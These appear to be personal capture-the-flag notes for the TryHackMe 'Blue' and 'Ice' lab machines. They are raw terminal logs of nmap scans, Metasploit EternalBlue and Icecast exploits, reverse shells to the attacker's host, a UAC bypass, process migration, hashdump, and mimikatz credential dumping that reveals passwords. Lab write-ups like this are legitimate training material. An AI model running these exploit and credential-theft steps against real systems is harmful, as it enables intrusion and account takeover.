kali@kali:~/Documents/THM/blue$ sudo nmap -sC -sV 10.10.124.3

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 20:44 EDT
    Nmap scan report for 10.10.124.30
    Host is up (0.14s latency).
    Not shown: 991 closed ports
    PORT      STATE SERVICE        VERSION
    135/tcp   open  msrpc          Microsoft Windows RPC
    139/tcp   open  netbios-ssn    Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds   Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    3389/tcp  open  ms-wbt-server?
    |_ssl-date: 2020-05-03T00:45:47+00:00; -1s from scanner time.
    49152/tcp open  msrpc          Microsoft Windows RPC
    49153/tcp open  msrpc          Microsoft Windows RPC
    49154/tcp open  msrpc          Microsoft Windows RPC
    49158/tcp open  msrpc          Microsoft Windows RPC
    49160/tcp open  msrpc          Microsoft Windows RPC
    Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 1h14m58s, deviation: 2h30m00s, median: -1s
    |_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:a7:6a:15:93:60 (unknown)
    | smb-os-discovery: 
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: Jon-PC
    |   NetBIOS computer name: JON-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2020-05-02T19:45:41-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-05-03T00:45:41
    |_  start_date: 2020-05-03T00:37:19

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 157.74 seconds

kali@kali:~/Documents/THM/blue$ nmap --script=smb-vuln-ms* 10.10.124.30

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-02 21:08 EDT
    Nmap scan report for 10.10.124.30
    Host is up (0.14s latency).
    Not shown: 991 closed ports
    PORT      STATE SERVICE
    135/tcp   open  msrpc
    139/tcp   open  netbios-ssn
    445/tcp   open  microsoft-ds
    3389/tcp  open  ms-wbt-server
    49152/tcp open  unknown
    49153/tcp open  unknown
    49154/tcp open  unknown
    49158/tcp open  unknown
    49160/tcp open  unknown

    Host script results:
    |_smb-vuln-ms10-054: false
    |_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
    | smb-vuln-ms17-010: 
    |   VULNERABLE:
    |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
    |     State: VULNERABLE
    |     IDs:  CVE:CVE-2017-0143
    |     Risk factor: HIGH
    |       A critical remote code execution vulnerability exists in Microsoft SMBv1
    |        servers (ms17-010).
    |           
    |     Disclosure date: 2017-03-14
    |     References:
    |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
    |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
    |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

    Nmap done: 1 IP address (1 host up) scanned in 14.75 seconds

Metasploit

metasploit search

    msf5>search ms17

    Matching Modules
    ================

       #   Name                                                   Disclosure Date  Rank     Check  Description
       -   ----                                                   ---------------  ----     -----  -----------                                    
       0   auxiliary/admin/mssql/mssql_enum_domain_accounts                        normal   No     Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration                                                                                                                          
       1   auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli                   normal   No     Microsoft SQL Server SQLi SUSER_SNAME Windows Domain Account Enumeration                                                                                                                     
       2   auxiliary/admin/mssql/mssql_enum_sql_logins                             normal   No     Microsoft SQL Server SUSER_SNAME SQL Logins Enumeration                                                                                                                                      
       3   auxiliary/admin/mssql/mssql_escalate_execute_as                         normal   No     Microsoft SQL Server Escalate EXECUTE AS       
       4   auxiliary/admin/mssql/mssql_escalate_execute_as_sqli                    normal   No     Microsoft SQL Server SQLi Escalate Execute AS  
       5   auxiliary/admin/smb/ms17_010_command                   2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution                                                                                                  
       6   auxiliary/scanner/smb/smb_ms17_010                                      normal   No     MS17-010 SMB RCE Detection                     
       7   exploit/windows/fileformat/office_ms17_11882           2017-11-15       manual   No     Microsoft Office CVE-2017-11882                
       8   exploit/windows/smb/ms17_010_eternalblue               2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption                                                                                                                               
       9   exploit/windows/smb/ms17_010_eternalblue_win8          2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+                                                                                                                     
       10  exploit/windows/smb/ms17_010_psexec                    2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution                                                                                                     
       11  exploit/windows/smb/smb_doublepulsar_rce               2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution   

Run Scanner

msf5 auxiliary(scanner/smb/smbms17010) > show options

    Module options (auxiliary/scanner/smb/smb_ms17_010):

       Name         Current Setting                                                 Required  Description
       ----         ---------------                                                 --------  -----------
       CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
       CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
       CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
       NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
       RHOSTS       10.10.124.30                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
       RPORT        445                                                             yes       The SMB service port (TCP)
       SMBDomain    .                                                               no        The Windows domain to use for authentication
       SMBPass                                                                      no        The password for the specified username
       SMBUser                                                                      no        The username to authenticate as
       THREADS      1                                                               yes       The number of concurrent threads (max one per host)

    msf5 auxiliary(scanner/smb/smb_ms17_010) > run

    [+] 10.10.124.30:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activemodel-4.2.11.1/lib/active_model/validations/numericality.rb:68: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead

    [*] 10.10.124.30:445      - Scanned 1 of 1 hosts (100% complete)
    [*] Auxiliary module execution completed

Run Exploit

msf5 exploit(windows/smb/ms17010eternalblue) > set RHOSTS 10.10.124.30

    RHOSTS => 10.10.124.30
    msf5 exploit(windows/smb/ms17_010_eternalblue) > run

    [*] Started reverse TCP handler on 10.9.9.59:4444 
    [*] 10.10.124.30:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
    [+] 10.10.124.30:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] 10.10.124.30:445      - Scanned 1 of 1 hosts (100% complete)
    [*] 10.10.124.30:445 - Connecting to target for exploitation.
    [+] 10.10.124.30:445 - Connection established for exploitation.
    [+] 10.10.124.30:445 - Target OS selected valid for OS indicated by SMB reply
    [*] 10.10.124.30:445 - CORE raw buffer dump (42 bytes)
    [*] 10.10.124.30:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
    [*] 10.10.124.30:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
    [*] 10.10.124.30:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
    [+] 10.10.124.30:445 - Target arch selected valid for arch indicated by DCE/RPC reply
    [*] 10.10.124.30:445 - Trying exploit with 12 Groom Allocations.
    [*] 10.10.124.30:445 - Sending all but last fragment of exploit packet
    [*] 10.10.124.30:445 - Starting non-paged pool grooming
    [+] 10.10.124.30:445 - Sending SMBv2 buffers
    [+] 10.10.124.30:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
    [*] 10.10.124.30:445 - Sending final SMBv2 buffers.
    [*] 10.10.124.30:445 - Sending last fragment of exploit packet!
    [*] 10.10.124.30:445 - Receiving response from exploit packet
    [+] 10.10.124.30:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
    [*] 10.10.124.30:445 - Sending egg to corrupted connection.
    [*] 10.10.124.30:445 - Triggering free of corrupted buffer.
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Command shell session 1 opened (10.9.9.59:4444 -> 10.10.124.30:49219) at 2020-05-02 21:18:53 -0400
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    [+] 10.10.124.30:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Granted Access

C:\Windows\system32>

Upgrade Session

msf5 post(multi/manage/shelltometerpreter) > sessions -u 1

    [*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

    [*] Upgrading session ID: 1
    [*] Starting exploit/multi/handler
    [*] Started reverse TCP handler on 10.9.9.59:4433 
    msf5 post(multi/manage/shell_to_meterpreter) > 
    [*] Sending stage (180291 bytes) to 10.10.124.30
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Meterpreter session 2 opened (10.9.9.59:4433 -> 10.10.124.30:49233) at 2020-05-02 21:30:13 -0400
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/statement_cache.rb:90: warning: Capturing the given block using Proc.new is deprecated; use `&block` instead
    [*] Stopping exploit/multi/handler

msf5 post(multi/manage/shelltometerpreter) > sessions

    Active sessions
    ===============

      Id  Name  Type                     Information                                                                       Connection
      --  ----  ----                     -----------                                                                       ----------
      1         shell x64/windows        Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation...  10.9.9.59:4444 -> 10.10.124.30:49231 (10.10.124.30)
      2         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ JON-PC                                                      10.9.9.59:4433 -> 10.10.124.30:49233 (10.10.124.30)

msf5 post(multi/manage/shelltometerpreter) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > ps

      Process List
      ============

       PID   PPID  Name                  Arch  Session  User                          Path
       ---   ----  ----                  ----  -------  ----                          ----
       0     0     [System Process]                                                   
       4     0     System                x64   0                                      
       100   668   LogonUI.exe           x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
       356   716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
       460   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       568   560   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
       616   560   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
       628   608   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
       668   608   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
       716   616   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
       724   616   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
       732   616   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
       788   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       840   716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       908   716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       932   1372  powershell.exe        x86   0        NT AUTHORITY\SYSTEM           C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
       956   716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1116  716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1228  716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       1356  716   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
       1372  2020  powershell.exe        x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
       1392  716   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
       1452  716   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
       1528  716   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
       1600  932   cmd.exe               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\SysWOW64\cmd.exe
       1676  716   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
       1952  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
       1996  716   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
       2080  840   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
       2208  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       2236  1356  cmd.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\cmd.exe
       2340  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       2520  716   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
       2584  716   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
       2624  716   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
       2752  716   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
       2944  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       3024  568   conhost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
       3068  716   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe

Cracking Passwords

meterpreter > migrate

       Usage: migrate <<pid> | -P <pid> | -N <name>> [-t timeout]

       Migrates the server instance to another process.
       NOTE: Any open channels or other dynamic state will be lost.

meterpreter > migrate -N winlogon.exe

       [*] Migrating from 932 to 668...
       [*] Migration completed successfully.

meterpreter > hashdump

       Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
       Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

Jons Passwoprd Cracks to

Hash Type Result
ffb43f0de35be4d9917ac0cc8ad57f8d NTLM alqfna22

All Flags Found !!!!

THM - ICE

Ice

Skibum 5/3/2020


IP Address 10.10.181.247

Recon

kali@kali:~$ nmap -sC -sV 10.10.181.247

    Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 13:29 EDT
    Stats: 0:02:24 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
    NSE Timing: About 98.96% done; ETC: 13:32 (0:00:01 remaining)
    Nmap scan report for 10.10.181.247
    Host is up (0.14s latency).
    Not shown: 988 closed ports
    PORT      STATE SERVICE            VERSION
    135/tcp   open  msrpc              Microsoft Windows RPC
    139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
    445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
    3389/tcp  open  ssl/ms-wbt-server?
    |_ssl-date: 2020-05-03T17:31:07+00:00; -2s from scanner time.
    5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
    |_http-server-header: Microsoft-HTTPAPI/2.0
    |_http-title: Service Unavailable
    8000/tcp  open  http               Icecast streaming media server
    |_http-title: Site doesn't have a title (text/html).
    49152/tcp open  msrpc              Microsoft Windows RPC
    49153/tcp open  msrpc              Microsoft Windows RPC
    49154/tcp open  msrpc              Microsoft Windows RPC
    49158/tcp open  msrpc              Microsoft Windows RPC
    49159/tcp open  msrpc              Microsoft Windows RPC
    49160/tcp open  msrpc              Microsoft Windows RPC
    Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

    Host script results:
    |_clock-skew: mean: 1h14m58s, deviation: 2h30m00s, median: -1s
    |_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:00:4f:e5:d5:44 (unknown)
    | smb-os-discovery: 
    |   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
    |   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
    |   Computer name: Dark-PC
    |   NetBIOS computer name: DARK-PC\x00
    |   Workgroup: WORKGROUP\x00
    |_  System time: 2020-05-03T12:31:02-05:00
    | smb-security-mode: 
    |   account_used: guest
    |   authentication_level: user
    |   challenge_response: supported
    |_  message_signing: disabled (dangerous, but default)
    | smb2-security-mode: 
    |   2.02: 
    |_    Message signing enabled but not required
    | smb2-time: 
    |   date: 2020-05-03T17:31:02
    |_  start_date: 2020-05-03T17:28:52

Exploit

msf5 > search icecast

    Matching Modules
    ================

       #  Name                                 Disclosure Date  Rank   Check  Description
       -  ----                                 ---------------  ----   -----  -----------
       0  exploit/windows/http/icecast_header  2004-09-28       great  No     Icecast Header Overwrite

msf5 > use exploit/windows/http/icecast_header

msf5 exploit(windows/http/icecast_header) > show options

    Module options (exploit/windows/http/icecast_header):\

       Name    Current Setting  Required  Description
       ----    ---------------  --------  -----------
       RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'  
       RPORT   8000             yes       The target port (TCP)

    Exploit target:

       Id  Name
       --  ----
       0   Automatic

msf5 exploit(windows/http/icecast_header) > set RHOSTS 10.10.181.247 RHOSTS => 10.10.181.247

msf5 exploit(windows/http/icecast_header) > run

    [*] Started reverse TCP handler on 10.9.9.59:4444
    [*] Sending stage (180291 bytes) to 10.10.181.247
    [*] Meterpreter session 1 opened (10.9.9.59:4444 -> 10.10.181.247:49189) at 2020-05-03 13:42:08 -0400

Access Granted

meterpreter > getuid

Server username: Dark-PC\Dark

meterpreter > sysinfo

    Computer        : DARK-PC
    OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
    Architecture    : x64
    System Language : en_US
    Domain          : WORKGROUP
    Logged On Users : 2
    Meterpreter     : x86/windows

Determine how to Escalate

msf5 > run post/multi/recon/localexploitsuggester

msf5 > use exploit/windows/local/bypassuac_eventvwr

msf5 exploit(windows/local/bypassuac_eventvwr) > show options

    Module options (exploit/windows/local/bypassuac_eventvwr):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       SESSION  1                yes       The session to run this module on.


    Exploit target:

       Id  Name
       --  ----
       0   Windows x86

msf5 exploit(windows/local/bypassuac_eventvwr) > sessions

    Active sessions
    ===============

      Id  Name  Type                     Information             Connection
      --  ----  ----                     -----------             ----------
      1         meterpreter x86/windows  Dark-PC\Dark @ DARK-PC  10.9.9.59:4444 -> 10.10.181.247:49200 (10.10.181.247)

msf5 exploit(windows/local/bypassuac_eventvwr) > run

    [*] Started reverse TCP handler on 10.9.9.59:4444 
    [*] UAC is Enabled, checking level...
    [+] Part of Administrators group! Continuing...
    [+] UAC is set to Default
    [+] BypassUAC can bypass this setting, continuing...
    [*] Configuring payload and stager registry keys ...
    [*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
    [+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
    [*] Sending stage (180291 bytes) to 10.10.181.247
    [*] Meterpreter session 2 opened (10.9.9.59:4444 -> 10.10.181.247:49206) at 2020-05-03 13:54:56 -0400
    [*] Cleaning up registry keys ...

meterpreter > getprivs

    Enabled Process Privileges
    ==========================

    Name
    ----
    SeBackupPrivilege
    SeChangeNotifyPrivilege
    SeCreateGlobalPrivilege
    SeCreatePagefilePrivilege
    SeCreateSymbolicLinkPrivilege
    SeDebugPrivilege
    SeImpersonatePrivilege
    SeIncreaseBasePriorityPrivilege
    SeIncreaseQuotaPrivilege
    SeIncreaseWorkingSetPrivilege
    SeLoadDriverPrivilege
    SeManageVolumePrivilege
    SeProfileSingleProcessPrivilege
    SeRemoteShutdownPrivilege
    SeRestorePrivilege
    SeSecurityPrivilege
    SeShutdownPrivilege
    SeSystemEnvironmentPrivilege
    SeSystemProfilePrivilege
    SeSystemtimePrivilege
    SeTakeOwnershipPrivilege
    SeTimeZonePrivilege
    SeUndockPrivilege

meterpreter > ps

    Process List
    ============

     PID   PPID  Name                  Arch  Session  User                          Path
     ---   ----  ----                  ----  -------  ----                          ----
     0     0     [System Process]                                                   
     4     0     System                x64   0                                      
     416   4     smss.exe              x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
     544   536   csrss.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
     584   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     592   536   wininit.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
     604   584   csrss.exe             x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
     652   584   winlogon.exe          x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
     692   592   services.exe          x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
     700   592   lsass.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
     708   592   lsm.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
     816   692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     848   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     884   692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     932   692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1020  692   svchost.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
     1060  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1184  692   svchost.exe           x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
     1212  816   WmiPrvSE.exe          x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
     1300  1020  dwm.exe               x64   1        Dark-PC\Dark                  C:\Windows\System32\dwm.exe
     1312  1284  explorer.exe          x64   1        Dark-PC\Dark                  C:\Windows\explorer.exe
     1364  692   spoolsv.exe           x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
     1392  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1456  692   taskhost.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\taskhost.exe
     1540  692   amazon-ssm-agent.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe
     1636  692   LiteAgent.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Xentools\LiteAgent.exe
     1676  692   svchost.exe           x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
     1816  692   Ec2Config.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Amazon\Ec2ConfigService\Ec2Config.exe
     2072  908   powershell.exe        x86   1        Dark-PC\Dark                  C:\Windows\SysWOW64\WindowsPowershell\v1.0\powershell.exe
     2208  692   sppsvc.exe            x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
     2224  692   TrustedInstaller.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
     2284  1312  Icecast2.exe          x86   1        Dark-PC\Dark                  C:\Program Files (x86)\Icecast2 Win32\Icecast2.exe
     2500  692   vds.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
     2616  692   SearchIndexer.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\SearchIndexer.exe
     2644  816   rundll32.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\rundll32.exe
     2676  2644  dinotify.exe          x64   1        Dark-PC\Dark                  C:\Windows\System32\dinotify.exe
     3068  604   conhost.exe           x64   1        Dark-PC\Dark                  C:\Windows\System32\conhost.exe

meterpreter > migrate -N spoolsv.exe

    [*] Migrating from 2072 to 1364...
    [*] Migration completed successfully.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Load Cracking Tool

meterpreter > load kiwi

    Loading extension kiwi...
      .#####.   mimikatz 2.2.0 20191125 (x64/windows)
     .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
     ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
     ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
     '## v ##'        Vincent LE TOUX            ( vincent.letoux@gmail.com )
      '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/

    Success.

Kiwi Commands

=============

Command Description
------- -----------
credsall Retrieve all credentials (parsed)
creds
kerberos Retrieve Kerberos creds (parsed)
credsmsv Retrieve LM/NTLM creds (parsed)
creds
ssp Retrieve SSP creds
credstspkg Retrieve TsPkg creds (parsed)
creds
wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsyncntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden
ticketcreate Create a golden kerberos ticket
kerberos
ticketlist List all kerberos tickets (unparsed)
kerberos
ticketpurge Purge any in-use kerberos tickets
kerberos
ticketuse Use a kerberos ticket
kiwi
cmd Execute an arbitary mimikatz command (unparsed)
lsadumpsam Dump LSA SAM (unparsed)
lsadumpsecrets Dump LSA secrets (unparsed)
passwordchange Change the password/hash of a user
wifi
list List wifi profiles/creds for the current user
wifilistshared List shared wifi profiles/creds (requires SYSTEM)

meterpreter > creds_all

    [+] Running as SYSTEM
    [*] Retrieving all credentials
    msv credentials
    ===============

    Username  Domain   LM                                NTLM                              SHA1
    --------  ------   --                                ----                              ----
    Dark      Dark-PC  e52cac67419a9a22ecb08369099ed302  7c4fe5eada682714a036e39378362bab  0d082c4b4f2aeafb67fd0ea568a997e9d3ebc0eb

    wdigest credentials
    ===================

    Username  Domain     Password
    --------  ------     --------
    (null)    (null)     (null)
    DARK-PC$  WORKGROUP  (null)
    Dark      Dark-PC    Password01!

